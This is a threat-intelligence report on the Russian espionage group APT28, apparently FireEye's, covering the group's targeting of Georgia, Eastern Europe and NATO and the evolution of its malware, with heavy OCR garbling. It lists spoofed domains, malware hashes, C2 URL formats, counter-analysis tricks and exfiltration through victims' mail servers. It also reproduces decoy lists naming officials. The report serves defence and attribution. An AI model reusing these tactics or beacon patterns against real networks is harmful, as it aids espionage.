<T^FireEye™
APT28: ggsg^^*
A WlNDOW INTO RUSSIA'S CYBER ESPIONAGE OPERATIONS?
APT 28: A Window into Russia's Cyber Espionage Operations?
CONTENTS
EXECUTIVE SUMMARY...................................................................................................................................................................................................................................................................................3
APT28 TARGETING REFLECTS RUSSIAN INTERESTS........................................................................................................................................................................6
APT28 interest in the Caucasus. Particularly Georgia...........................................................................................................................................................7
APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA).......................................................................................8
APT28 Targeting of the Georgian Ministry of Defense.......................................................................................................................................9
APT28 Targeting a Journalist Covering the Caucasus......................................................................................................................................10
APT28's Other Targets in the Caucasus.......................................................................................................................................................................................11
APT28 Targeting of Eastern European Governments and Militaries 12
APT28 Targeting of NATO and Other European Security Organizations....................................................................................14
APT28 Targets European Defense Exhibitions...............................................................................................................................................................16
Other APT28 Targets Are Consistent With Nation State Interests........................................................................................................17
APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS........................................................................................................................19
Modular Implants Indicate a Formal Development Environment...............................................................................................................24
APT28 Mai ware Indicates Russian Speakers in a Russian Time Zone................................................................................................25
Compile Times Align with Working Hours in Moscow and St. Petersburg...............................................................27
CONCLUSION.................................................................................................................................................................................................................................................................................................................28
APPENDIX A: DISTINGUISHING THREATGROUPS.........................................................................................................................................................................29
APPENDIX B: TIMELINE OF APT28 LURES.........................................................................................................................................................................................................30
APPENDIX C: SOURFACE/CORESHELL.....................................................................................................................................................................................................................31
APPENDIX D: CHOPSTICK...................................................................................................................................................................................................................................................................35
APPENDIX E: OLDBAIT................................................................................................................................................................................................................................................................................43
2 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
EXECUTIVE SUMMARY
Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has long been a whispered frontrunner among capable nations for performing sophisticated network operations. This perception is due in part to the Russian government's alleged involvement in the cyber attacks accompanying its invasion of Georgia in 2008, as well as the rampant speculation that Moscow was behind a major U.S. Department of Defense network compromise, also in 2008. These rumored activities, combined with a dearth of hard evidence, have made Russia into something of a phantom in cyberspace.
In this paper we discuss a threat group whose malware is already fairly well-known in the cybersecurity community. This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain. Nor have we observed the group steal and profit from financial account information.
The activity that we profile in this paper appears to be the work of a skilled team of developers and operators collecting intelligence on defense and geopolitical issues - intelligence that would only be useful to a government. We believe that this is an advanced persistent threat (APT) group engaged in espionage against political and military targets including
the country of Georgia, Eastern European governments and militaries, and European security organizations since at least 2007. They compile malware samples with Russian language settings during working hours consistent with the time zone of Russia's major cities, including Moscow and St. Petersburg.
While we don't have pictures of a building, personas to reveal, or a government agency to name, what we do have is evidence of longstanding, focused operations that indicate a government sponsor - specifically, a government based in Moscow.
We are tracking this group as APT28.
1 Markoff, John. "Before the Gunfire, Cyberattacks'.The NewYorkTimes 12 August 2008. Web. http://www.nytimes.com/2008/08/13/technology/13cyber.html
2 Knowlton, Brian. "Military Computer Attack Confirmed". The NewYorkTimes. 25 August 2010. Web. http://www.nytimes.com/2010/08/26/ technology/26cyber.html
3 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Caucasus
KEY FINDINGS
APT28 targets insider information related to governments, militaries, and security organizations that would likely benefit the Russian government.
	fin	i
GEORGIA	EASTERN EUROPE	I SECURITY ORGANIZATIONS
APT28 likely seeks to collect intelligence about Georgia's security and politica dynamics by targeting officials working for the Ministry of Internal Affairs and the Ministry of Defense.	APT28 has demonstrated interest in Eastern European governments and security organizations. These victims would provide the Russian government with an ability to predict policymaker intentions and gauge its ability to influence public opinion.	APT28 appeared to target individuals affiliated with European security organizations and global multilatera institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe.
4 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Malware compile times suggest that APT28 developers have consistently updated their tools over the last seven years.
KEY FINDINGS
Since 2007, APT28 has systematically evolved its malware, using flexible and lasting platforms indicative of plans for long-term use. The coding practices evident in the group's malware suggest both a high level of skill and an interest in complicating reverse engineering efforts.
Malware compile times suggest that APT28 developers nave consistently updated their tools over the last seven years.
APT28 malware, in particular the family of modular oackdoorsthatwe call CHOPSTICK, indicates a formal code development environment. Such ar environment would almost certainly be required to track and define the various modules that can be included in the backdoor at compile time.
APT28 tailors implants for specific victim environments. They steal data by configuring their implants to send data out of the network using a victim network's mail server.
Several of APT28's malware samples contain counter-analysis capabilities including runtime checks to identify an analysis environment, obfuscated strings unpacked at runtime, and the inclusion of unused machine instructions to slow analysis.
I ndicators in APT28's malware suggest that the group consists of Russian speakers operating during business hours in Russia's major cities.
More than half of the malware samples with Portable Executable (PE) resources that we have attributed to APT28 included Russian language settings (as opposed to neutral or English settings), suggesting that a significant portion of APT28 malware was compiled in a Russian language build environment consistently over the course of six years (2007 to 2013).
£0
Over 96% of the malware samples we have attributed to APT28 were compiled between Monday and Friday. More than 89% were compiled between 8AM and 6PM in the UTC+4 time zone, which parallels the working hours in Moscow and St. Petersburg. These samples had compile dates rangingfrom mid-2007 to September 2014.
5 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Three themes in APT28's targeting clearly reflect areas of specific interest to an Eastern European government, most likely the Russian government.
APT28TARGETING REFLECTS
RUSSIAN INTERESTS
Many of APT28's targets align generally with interests that are typical of any government. However, three themes ir APT28's targeting clearly reflects areas of specific interest to an Eastern European government, most ikelythe Russian government. These include the Caucasus (especially the Georgian government), Eastern European governments and militaries, and specific security organizations.
APT28 uses spearphishing emails to target its victims, a common tactic in which the threat group crafts its emails to mention specific topics (lures) relevant to recipients. This increases the ikelihood that recipients will believe that the email is legitimate and will be interested ir openingthe message, opening any attached files, or clicking on a link in the body of the email. Since spearphishing lures are tailored to the recipients
'Bloomberg. "Neiman Marcus Hackers Set Off 60,000 Alerts While Bagging Credit Card Data." February 2014.
3 Ibid.
'Ibid.
whose accounts APT28 hopes to breach, the subjects of the lures provide clues as to APT28's targets and interests. For example, if the group's ures repeatedly refer to the Caucasus, then this most likely indicates that APT28 is trying to gair access to the accounts of individuals whose work oertainstothe Caucasus. Similarly,APT28's practice of registering domains that mimic those of legitimate news, politics, or other websites indicates topics that are relevant to APT28's targets.
We identified three themes in APT28's lures and registered domains, which together are oarticularly relevant to the Russian government.
In addition to these themes, we have seen APT28 target a range of political and military organizations. We assess that the work of these organizations serves nation state governments.
APT 28: Three Themes
The Caucasus, particularly the country of Georgia
HIT
Eastern European governments and militaries
The North Atlantic Treaty Organization (NATO) and other European security organizations
6 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT28INTEREST IN
THE CAUCASUS, PARTICULARLY GEORGIA
Tie Caucasus, a region that includes Chechnya and other Russian republics and the independent states of Georgia, Armenia, and Azerbaijan, continues to experience oolitical unrest. The Georgian government's oosture and ties to the West are a frequent source of Moscow's frustration, particularly after the 2008 war. Overall, issues in the Caucasus ikely serve as focal points for Russiar intelligence collection efforts.
Since 2011, APT28 has used lures written ir Georgian that are probably intended to target Georgian government agencies or citizens. APT28 is likely seeking information on Georgia's security and diplomatic postures. Specifically, the group has targeted the Georgian Ministry of Internal Affairs (MIA) and the Ministry of Defense (MOD). We also observed efforts to target a journalist working on issues in the Caucasus and a controversial Chechen news site.
7 fireeye.com
<k>FireEye
Georgian Ministry of Internal Affairs (MIA)
APT28 made at least two specific attempts to target the Georgian Ministry of Internal Affairs.
APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)
The MIA harbors sensitive information about the inner workings of Georgia's security operations, the country's engagement in multilateral institutions, and the government's communications backbone. It is responsible for3:
Policing, internal security, and border patrols Counterintelligence Counterterrorism International relations Defense of Georgia's strategic facilities and assets •    "Operative-Technical" tasks
APT28 made at least two specific attempts to target the MIA. In one case, we identified ar APT28 lure from mid-2013 that referenced MIA-related topics and employed malware that attempted to disguise its activity as legitimate MIA email traffic. The lure consisted of a weaponized Excel file that presented a decoy document containing a list of Georgian driver's
icense numbers. The backdoor attempted to establish a connection to a Georgian MIA mai server and communicate via MIA email addresses ending with "@mia.ge.gov". Once connected to the mail server, APT28's backdoor sent an emai message using a subject line related to driver's icenses (in Georgian), and attached a file containing system reconnaissance information. This tactic could allow APT28 to obtain data from the MIA's network through a less-monitored 'oute, limiting the MIA network security department's abilities to detect the traffic.
In the second example of MIA targeting, an APT28 ure used an information technology-themed decoy document that included references to the Windows domain "MIA Users\Ortachala..." (Figure 1). This probably referred to the MIA facility in the Ortachala district of Tbilisi, Georgia's capital city. The decoy document also contains metadata listing "MIA" as the company name and "Beka Nozadze"4 as an author, a possible reference to a system administrator in Tbilisi. The text of the document ourports to provide domain and user group setup
1 Georgian Ministry of Internal Affairs website http://police.ge/en/home
4 Queries on the author yielded a Linked In page for a person of the same name who serves as a system administrator in Tbilisi.
8 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
information for internal Windows XP and Windows 7 systems. APT28 possibly crafted this document to appear legitimate to all MIA system users and intended to breach the MIA network specifically using the embedded malware.
APT28 Targeting of the Georgian Ministry of Defense
APT28 also appeared to target Georgia's MOD along with a U.S. defense contractor that was
training the Georgian military. APT28 used a lure document that installed a SOURFACE downloader [further discussed in the Malware section) and contained a listing of birthdays for members of a working group between the Georgian MOD and the U.S. defense contractor. The U.S. contractor was involved in a working group to advise the MOD and Georgian Armed Forces, assess Georgia's military capabilities, and develop a military training orogramforthe country
Figure 1: Georgian MIA-related decoy
Windows XP bob£>gdob oom.8go63o goi6g0obo6o6goob fäjbgoo
1. QoagaoBb^xjncjoDbob^O^
2. a <xyKp<)OT WfileO 1 \SOFT\OS\Windows XPVWiaXPUpdates
3. Q053ioBb<^><i«oiico 930Q™a a^Bäb^g&i
4. cjoißioBb^iwcico 930<E?ö böjort« äftmyftädö (Symantec, MS Office, Adobe Acrobat, Codecs, Players etc.)
5. oasioDCJOgoBmcojcjcOo^IogAo
6. Domain user name coä Domain computer name b'j Qocmfö c™ ico 36000 ftabßöco 3gbäoädob lüjöbiq»gog3o MIA Users\Ort achala... ^06555380030 338000333530 cooiögoBob «äcwjwo^oji
08335330b 3n3äo,oÖ3^iO
7. 333000300 Computer Managemente o cal users and Groups\Groups'Administrators
8. QDas^^cHjBcogco (hnd Administrators jfcotDSo'0 Bgjöobqj^oi OTD Admins coi OTD IT Support
9. 05536^8360030) A«8 Firewall BäAco^owoö coa Remote Desktop 8mob3&3<j»o 10.0053^6360030) <wi8 My ComputenProperties-tlo Allow users to connect remotely to this
computer 8e»6o36™)<j»oi
Windows 7 bob£)g8ob oo«.8go63o op5Äg&o£)6o6goob ^gbgoo
9 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Figure 2: Excerpt of APT28's letter to a journalist writing on Caucasus-related issues
We wish our cooperation will be both profitable and trusted. Our aim in the Caucasian region is to help people who struggle for their independence, liberty and human rights. We all know, that world is often unfair and cruel, but all together we can make it better.
Send your articles on this email - in Russian or English, please. There are some difficulties with Caucasian languages, but we'll solve the problem pretty soon, I hope.
Targeting journalists could provide APT28 and its sponsors with away to monitor public opinion, identify dissidents, spread disinformation, or facilitate further targeting.
state-sponsored threat actors to steal information that sheds light on these topics.
5 "The EU's Association Agreements with Georgia, the Republic of Moldova and Ukraine". European Union Press Release Database. 23 June 2014.
Web. http://e uropa.eu/rapid/press-release_MEMO-14-430_en.htrr 5 We attempted to identify candidate journalists in the country. One of these was a Georgian national of Chechen descent, whose work appears to center on
Chechen and human rights issues. Ultimately, however, we cannot confirm the identity of the target(s).
We believe thatAPT28's targeting of the MOD aligns with Russian threat perceptions. The growing U.S.-Georgian military relationship has oeen a source of angst for Russia. Georgia and Russia severed diplomatic relations followingthe Russia-Georgia War in 2008, and Georgia has since sought to align itself more closely with western security organizations. Additionally, ir June 2014, despite Russia's vocal objections, Georgia, along with Ukraine and Moldova, signed association accords with the EU.5 This move olaced all three countries more firmly in the EU's oolitical, economic, and security spheres of influence. Georgian military security issues, oarticularly with regard to U.S. cooperation and NATO, provide a strong incentive for Russiar
APT28 Targeting a Journalist Covering the Caucasus
Another one of APT28's lures appeared to target a specificjournalist covering issues in the Caucasus region. In late 2013, APT28 used a lure that contained a letter addressing a journalist by nis first name and claimingto originate from a "Chief Coordinator" in Reason Magazine's "Caucasian Issues Department" - a division that does not appear to exist.6 (Reason Magazine is a US-based magazine) The letter welcomed the individual as a contributor and requested topic ideas and identification information in order to establish him atthe magazine. In the background, the decoy document installed a SOURFACE oackdoor on the victim's system.
10 fireeye.com
APT 28: A Window into Russia's Cyber Espionage Operations?
Table 1: Examples of APT28 domains imitating organizations in the Caucasus
APT28 Domain	Real Domain
kavkazcentr[.]info	The Kavkaz Center / The Caucasus Center, an international Islamic news agency with coverage of Islamic issues, particularly Russia and Chechnya (kavkazcenter.com)
rnil[.]am	
The body of the letter suggests that APT28 actors are able to read at least two languages - Russiar and English. The grammar of the letter also indicates that English is not the author's first anguage, despite it purportedly originating from a JS-based magazine. This implies that Russian may oe the APT28 author's preferred language.
Targetingjournalists could provide APT28 and its sponsors with away to monitor public opinion, identify dissidents, spread disinformation, or facilitate further targeting. Several other natior states are suspected of targetingjournalists and dissidents to monitor their activity, including China and Iran.7,8 Journalists in the Caucasus working or Caucasus independence issues would be a prime target for intelligence collection for Moscow. Journalists critical of the Kremlin have long oeen targets of surveillance and harassment, and a number of governments and humar nghts organizations have publicly criticized the government for its treatment of journalists and its increasing consolidation of control over the media.5
APT28's Other Targets in the Caucasus
We have seen APT28 register at least two domains mimickingthe domains of legitimate organizations in the Caucasus, as shown in the table below. One APT28 domain imitated a key Chechen-focused news website, while the other appeared to target members of the Armeniar military by hosting a fake login page.
Of particular note, the Kavkaz Center is a Chechen-run website designed to present ar alternative view to the long-running conflict oetween Russia and Chechen separatists. Ir 200410 and 2013,11 Russia's Foreign Minister voiced his displeasure that a Swedish company continues to host the Kavkaz Center website.
7 Moran, Ned, Villeneuve, Nart, Haq.Thofique.and Scott, Mike. "Operation Saffron Rose". FireEye. 13 May 2014. Web. http://www.fireeye.com/blog/technical/
ma lware-research/2014/05/operatio n-saffron-rose.html 3 The New York Times publicly disclosed their breach by APT12, which they assess was motivated by the China-based actors' need to know what the
newspaper was publishing about a controversial topic related to corruption and the Chinese Communist Party's leadership. 9 "Russia". Freedom House Press Release. 2013. Web. http://www.freedomhouse.Org/report/freedom-press/2013/russia#.VD8fe9R4rew 10"Chechen website promotes terror: Lavrov". UPI. 16 November 2014. Web. http://www.upi.com/Top_News/2004/ll/16/Chechen-website-promotes-
terror-Lavrov/UPI-11601100627922/ u"Lavrov urges Sweden to ban Chechen website server" The Voice of Russia. 15 May 2013. Web. http://voiceofrussia.com/news/2013_05_15/Lavrov-urges-
Sweden-to-ban-Chechen-website-server/
11 fireeye.com
<k> FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT28TARGETING OF
EASTERN EUROPEAN GOVERNMENTS AND MILITARIES
Figure 3: Decoy MH17 document probably sent to the Polish government
Malaysia, Netherlands call for immediate cessation of hostilities at crash site
Malaysia and the Netherlands have called for immediate cessation of hostilities in and around the crash site o f Malay sia Airline (MAS) Flight MH17 in Tprez, Ukraine, lest such tension escalates into war between the Ukrainian government and the separatist groups.
Malaysian Prime Minister Datuk Sen Najib Tun Razak said both countries also asked that all sides, the Ukraine government and separatists, respect the lives lost and integrity of the site, so that the investigation into the disaster may proceed.
"The long walk towards justice begins with this step,"Najib said ina statement at joint press briefing with his Dutch counterpart MarkRutte here Thursday.
The MAS flight, MH17, was flying from Amsterdam to Kuala Lumpur when it went down in Donetsk, eastern Ukraine near the Russianborder on July 17.
The Boeing 777-200 aiicraftwlnchwascairJ7ing298people-283 passengers andl^crew-was believed to have been shot down, but until today no one has claimed responsibility.
A total of 195 Dutch nationals were on board the flight.
Najib said for the sake of the grieving families, it was imperative that all remains at the crash s ite were repatriated as soon as possible.
Eastern European countries' political and military postures are traditional ly core Russiar government interests.The Kremlin has long regarded the former Soviet Republics and satellite states as in its sphere of economic, political, and military interest. Over the past two decades, as many of these states joined NATO and the EU, Russia has attempted to regain its influence in the region. Many of APT28's targets parallel this continued focus or Eastern European governments and militaries.
APT28 Targets Eastern European Government Organizations
We have evidence that APT28 made at least two attempts to compromise Eastern Europear government organizations:
• Ina late 2013 incident, a FireEye device deployed at an Eastern European Ministry of =oreign Affairs detected APT28 malware ir the client's network.
• More recently, in August 2014 APT28 used a ure (Figure 3) about hostilities surrounding a Malaysia Airlines flight downed in Ukraine ir a probable attempt to compromise the Polish government. A SOURFACE sample employed in the same Malaysia Airlines lure was referenced by a Polish computer security company in a blog post.12 The Polish security company indicated that the sample was "sent to the government," presumably the Polish government, given the company's locatior and visibility.
12 "MHT, MS12-27 Oraz *malware*.info" Malware@Prevenity. 11 August 2014. Web. http://malware.prevenity.com/2014/08/malware-info.html
12 fireeye.com
<E*> FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Table 2: Examples of APT28 domains imitating legitimate Eastern European organization names
APT28 Domain	Real Domain	
standartnevvs[.]com	Bulgarian Standart News website (standartnews.com)	
novinitie[.]com, nOvinite[.]com	Bulgarian Sofia News Agency website (novinite.com)	
qov[.]hu[.]com	Hungarian government domain (gov.hu)	
qOv[.]pl, mail[.]qOv[.]pl	Polish government domain (gov.pl) and mail server domain (mail.gov.pl)	
poczta.mon[.]qOv[.]pl	Polish Ministry of Defense mail server domain (poczta.mon.gov.pl)	
We have evidence that APT28 made at least two attempts to compromise Eastern European government organizations.
APT28 has registered domains similar to those of egitimate Eastern European news sites and governments, listed in Table 2. These domair registrations not only suggest that APT28 is interested in Eastern European political affairs, out also that the group targets Eastern Europear governments directly.
In addition, APT28 used one domain for command and control sessions (baltichost[.]org) that was themed afterthe Baltic Host exercises. Baltic Host is a multinational logistics planning exercise, hosted annually since 2009 by one of the three Baltic States (Estonia, Latvia, and Lithuania, all three of which are on Russia's border) on a rotational basis. In June 2014, this event was integrated with a arger U.S. Army training event, and focused or exercises to improve interoperability with regiona allies and partners.13-14
This domain registration suggests that APT28 sought to target individuals either participating ir the exercises or interested in Baltic military and security matters. Such targets would potentially orovide APT28 with sensitive tactical and strategic intelligence concerning regional military capabilities and relationships. These exercises are a particular point of interest in Moscow: pro-Kremlin press cited Russia's interpretation of these military exercises and NATO's involvement as a "sign of aggression," and Russia's Foreigr Minister publicly stated that the exercise was "a demonstration of hostile intention."15
'Saber Strike and Baltic Host kick off in Latvia, Lithuania and Estonia*. Estonian Defense Forces. 9 June 2014. Web. 11 June 2014. http://www.mil.ee/en/ news/825 l/saber-strike-and-baltic-host-kick-off-in-latvia,-lithuania-and-estonia
'Baltic Host 2014 rendering host nation support for the training audience of Exercise Saber Strike 2014 and repelling faked cyber-attacks". Republic of Lithuania Ministry of National Defense. 12 June 2014. Web. http://www.kam.lt/en/news_1098/current_issues/baltic_host_2014_rendering_host_nation. support_for_the_training_audience_of_exercise_saber_strike_2014_and_repelling_faked_cyber-attacks.htm
'Tanks, troops, jets: NATO countries launch full-scale war games in Baltic". Russia Today. 9 June 2014. Web. http://rt.com/news/164772-saber-strike-exercise-nato/
13 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT28TARGETING OF
NATO AND OTHER EUROPEAN SECURITY ORGANIZATIONS
APT28's lures and domain registrations also demonstrate their interest in NATO and other European security organizations. NATO remains a chief Russian adversary, or in the words of Russia's 2010 military doctrine, a "mair external military danger" particularly as it moves "closer to the borders of the Russian Federation."16 As the traditional western counterweight to the Soviet Union, Russia regards NATO, particularly NATO's eastward expansion, as a threat to Russia's strategic stability. APT28 also registered a domair name imitating the Organization for Security and Cooperation in Europe (OSCE), ar intergovernmental organization that has cited widespread fraud in numerous Russian state
elections. Insider information about NATO, the OSCE and other security organizations would inform Russian political and military policy.
Several of the domains APT28 registered imitated NATO domain names, includingthose of NATO Special Operations Headquarters and the NATO =uture Forces Exhibition. We also observed a user that we suspect works for NATO HQsubmitar APT28 sample to VirusTotal, probably as a result of receiving a suspicious email.
Table 3: Examples of APT28 domains imitating legitimate NATO and security websites
APT28 Domain	Real Domain
nato.nshq[.]in	NATO Special Operations Headquarters (nshq.nato.int)
natoexhibitionff14[.]com	NATO Future Forces 2014 Exhibition & Conference (natoexhibition.org)
login-osce[.]org	Organization for Security and Cooperation in Europe (osce.org)
The Military Doctrine of the Russian Federation, approved by Presidential edict on 5 February 2010.
14 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT28 also demonstrated an interest in defense attaches working in European countries. We identified an APT28 lurecontaininga decoy document with a list of British officers and U.S. and Canadian military attaches in London.
Figure4: Decoy document used against military attaches in 2012
UNITED KINGDOM
All member? ieleO ka-e r eljreSelici erOer leoui'ri iHiete: wneme)
Sr,-,a ..?5iMfr,-.; haaa rnr>p,i'aa aa.aa ill- ™' -a',:aa farar: aaa UnO While Ea^t
iVferaters are WnMy aaKea to a/aeaa Baeiraala am (arera cae flMfl Meaiaersaip Searala/y la caae aay eorraafieaa aaa ra Camaaltee Ftosffiu? (»/>are appataNeJ
E.~a=a ayMpa &>yvaiBa>aaDru\
- i n a 11 y, APT28 used a lure that contained an apparent non-public listing of contact information for defense attaches in the Ankara Military Attache Corps (AMAC)," which appears to be a professional organization of defense attaches in Turkey.
Figure 5: Ankara Military Attache Corps decoy document
ANKARA MILITARY ATTACHE CORPS (AMAC1 (September.oist 2010)
								
COUNTRY	APPT	RANK	NAME	VIFE	ARRIVAL	DEPART       OFFICE CONTACT	RESIDENCY	EMAIL
		FROM OUTSCE TURKEY: Country Cade is 90: Ankara 90 512 -XXX-XXXX Mob 90 XXXXXX-XXXX						
		I                            I                   I               I              I I						
		FOREIGN		ATTACHE LIAISON OFFICE		(FALOJ		
		ipc ointment	RANK	•IAN:		WIFE		There a re no office e-mails tl FALO
		Chief FALO	Kurmay AlBay	Ahmet C6UK				
		Liaison Officer	Binbasi	Mustafa Kemal KAHRAMAN				
		L aiEcn Office*	Yarbay	Metin UZAL		Sebnem		
		Liaison Officer	YJzba3i	Ekrern ERKAll		VifcJan		
		FALOTel:4183964 Fax:   4192036                                                               E-Mail" yat_as_ats_s@tsk.mitr						
		After hours emergencies Call TGS Urgent Process Center (UPC1 at 413 33 36						
		ABBREVIATIONS						
	□A       - Defence Attache				W__- Assistant___			
	MA      - Mlitary Attache				IT: fefephonB			
AA       - Army Attache					F:        facsimile (fax)			
AFA     - Air Force Attache						C:       cellular telephone		
GA     - Gendarmer« Attacn*						GS -   General staff		
HA      - Naval Attache						Vl_     - Vice___		
								
								
15 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT28 Targets European Defense Exhibitions
In addition to targeting European security organizations and governments, it appears that APT28 is targeting attendees of Europear defense exhibitions. Some of the APT28-'egistered domains imitated those of defense events held in Europe, such as the Farnborough Airshow2014, EuroNaval 2014, EUROSATORY 2014, and the CounterTerror Expo. In September 2014, APT28 registered a domain (smigroup-online.co[.]uk) that appeared to mimic that for the
SMi Group, a company that plans events for the "Defence, Security, Energy, Utilities, Finance and Pharmaceutical sectors." Among other events, the SMi Group is currently planning a military satellite communications event for November 2014.
Targeting organizations and professionals involved in these defense events would likely orovide APT28 with an opportunity to procure intelligence pertaining to newdefense technologies, as well as the victim organizations' operations, communications, and future plans.
Targeting organizations and professionals involved in these defense events would likely provide APT28 with an opportunity to procure intelligence pertaining to new defense technologies.
APT 28: A Window into Russia's Cyber Espionage Operations?
OTHER APT28 TARGETS
ARE CONSISTENT WITH NATION STATE INTERESTS
APT28 has targeted a variety of organizations that fa 11 outside of the three themes we Highlighted above. However, we are not oroEiling all of APT28's targets with the same detail because they are not particularly indicative of a specific sponsor's interests. They do indicate oarallel areas of interest to many governments and do not run counter to Russian state interests.
Other probable APT28 targets that we have identified:
Norwegian Army (Forsvaret)
Government of Mexico
Chilean Military
Pakistani Navy
J.S. Defense Contractors
European Embassy in Iraq
Special Operations Forces Exhibition (SOFEX)
in Jordar
Defense Attaches in East Asia Asia-Pacific Economic Cooperation (APEC) AEWayi News Site
KEY
APT28 Registered Domains Lure Document Phishing Email
INTERNATIONAL ORGANIZATION
European Commission
UN Office for the Coordination of Humanitarian Affairs
APEC
—
NATO
OSCE
World Bank
O I
EBBE I
ml
OTHER
Hizb ut-Tahir
Chechnya Global
Diplomatic Forum
Military Trade Shows
I
1
17 fireeye.com
<k>FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
APT 28: A Window into Russia's Cyber Espionage Operations?
Our analysis of some of the group's more commonly used tools indicates that APT28 has been systematically updating their malware since 2007.
APT28 MALWARE INDICATES
SKILLED RUSSIAN DEVELOPERS
APT28's tools are suggestive of the group's skills, ambitions, and identity. Our analysis of some of the group's more commonly used tools indicates that APT28 has beer systematical ly updating their tools since 2007. APT28 is most likely supported by a group of developers creating tools intended for long-term use and versatility, who make an effort to obfuscate their activity. This suggests that APT28 'eceives direct ongoingfinancial and other resources from a well-established organization, most likely a nation state government. APT28's malware settings suggest that the developers nave done the majority of their work in a Russiar anguage build environment during Russiar ousiness hours, which suggests that the Russiar government is APT28's sponsor.
Some of APT28's more commonly used tools are the SOURFACE downloader, its second stage oackdoor EVILTOSS, and a modular family of implants that we call CHOPSTICK.
SOURFACE:This downloader is typically called Sofacy within the cyber security community. However because we have observed the name "Sofacy" used to refer to APT28 malware generally (to include the SOURFACE dropper, EVILTOSS, CHOPSTICK, and the credential harvester OLDBAIT), we are using the name SOURFACE to precisely refer to a specific downloader. This downloader obtains a second-stage backdoor from a C2 server. CORESHELL is an updated version of SOURFACE.
EVILTOSS: T h is backdoor has been delivered through the SOURFACE downloader to gair system access for reconnaissance, monitoring, credential theft, and shellcode execution.
CHOPSTICK:This is a modular implant compiled from a software frameworkthat orovides tailored functionality and flexibility.
19 fireeye.com <sl) FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
A number of the malware variants that we profile oelow, especially the CHOPSTICKfamily, demonstrate formal coding practices indicative of methodical, diligent programmers. The modularity of CHOPSTICK alone, with its flexible and lasting olatform, demonstrates planningfor long-term use and versatility. We have also noted that APT28 tailors implants to their target environments, configuring them to use loca network resources such as email servers.
APT28 has attempted to obfuscate their code and implement counter-analysis techniques:
• One of the latest samples of CORESHELL includes counter-reverse engineering tactics via unused machine instructions. This would ninder static analysis of CORESHELL behavior oy creating a large amount of unnecessary noise in the disassembly.
• Anumberof CORESHELLdroppersalsc conduct runtime checks, attempting to determine if they are executing in an analysis environment, and if so, they do not trigger their payloads.
• Many samples across the SOURFACE/ CORESHELL, CHOPSTICK, and EVILTOSS
Figure 6: Typical deployment of SOURFACE ecosystem
Spearphishing Email	
	
Document with exploit	
	
	
SOURFACE downloader
Obtains 2nd stage
C2 Server
Deploys 2nd stage droppers
2nd stage implant
20 fireeye.com
<k> FireEye
APT 28: A Window into Russia's Cyber Espionage Operations?
Tialware families obfuscate strings that are decoded at runtime. Two of the malware families (SOURFACE/CORESHELL and EVILTOSS) use the same decryption sequence and similar algorithms for string encoding and decoding. These families encode their strings at compile time using a custom stream cipher. From a high level, these ciphers share a similar design across the malware families but differ slightly in the internal arithmetic operations. APT28 has employed RSA encryption to orotect files and stolen information moved from the victim's network to the controller.
APT28 has made incremental and systematic changes to the SOURFACE downloader and its surrounding ecosystem since as early as 2007. These changes indicate a long-standing and dedicated development effort behind APT28. We nave observed samples of the SOURFACE downloader compiled between 2007 and 2014. We call SOURFACE (samples are frequently named netids.dll) a first stage downloader oecause its primary job is to retrieve a second stage payload from a C2 server. Until 2013, the SOURFACE downloader used hard-coded IP addresses for C2 communications, whereas the future CORESHELL samples use domains.
EVOLUTION OF
INDICATES SYSTEMATIC DEVELOPMENT
WHAT IS A MALWARE ECOSYSTEM?
First, a malware family is a collection of malware in which each sample shares a signil amou nt of code with a 11 of the others. There a re exceptions: for exa mple, some f i les contain public and standard code libraries that we do not take into consideration when making a family determination.
A malware ecosystem is a group of malware families that work together to perf the same objective. Perhaps the simplest and most typical ecosystem is a dropper and a backdoor that are used together. They may not share the same code structure, but they are related because one drops and installs the other.
The ecosystem surrounding the SOURFACE downloader frequently consists of a dropper, which installs SOURFACE. The SOURFACE downloader then receives another dropper from its C2 server, a"A this second dropper installs a second stage backdoor, which is usually EVI LTOSS.
21 fireeye.com
APT 28: A Window into Russia's Cyber Espionage Operations?
In April 2013, based on compile time, the group oegan to make significant alterations to the SOURFACE downloader. They started by changing the compiled DLL name to "coreshell.dIL and making minor changes to the network communications, as seen in Figure 7.
The hostname, volume serial numberand OS version data are encoded in the new URL format. As seen in the table below, the SOURFACE/ CORESHELL developers also made other modifications that changed the exported function name and file size over time.
Figure 7: Example of modified SOURFACE vs. CORESHELL communications
SOURFACE URL for a sample compiled April 2013: http://[hostname]/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-05_01
CORESHELL URL for a sample compiled April 2013:
http://[hostname]/~xh/ch.cgi ?enhkZmlGNmYlYWgOeGcxMGQlMDUwMQ=
Table 4: Evolution of SOURFACE downloader overtime
				
MD5	Size	Compile Date	Export Name	Notes
272f0fde35dbdfccbca1e33373b3570d       11264    2013-04-16 10:49:25 UTC Initl
8b92fe86c5b7a9e34f433a6fbac8bc3a       14848    2013-08-06 07:53:03 UTC Initialize
9eebfebe3987fec3c395594dc57a0c4c       12800    2013-08-14 10:48:59 UTC Initialize
da2a657dc69d7320f2ffc87013f257ad       12800    2013-08-21 07:52:10 UTC     Initialize Same as previous.
1259c4fe5efd9bf07fc4c78466f2dd09        12800    2013-10-03 09:21:10 UTC     Initialize Same as previous.
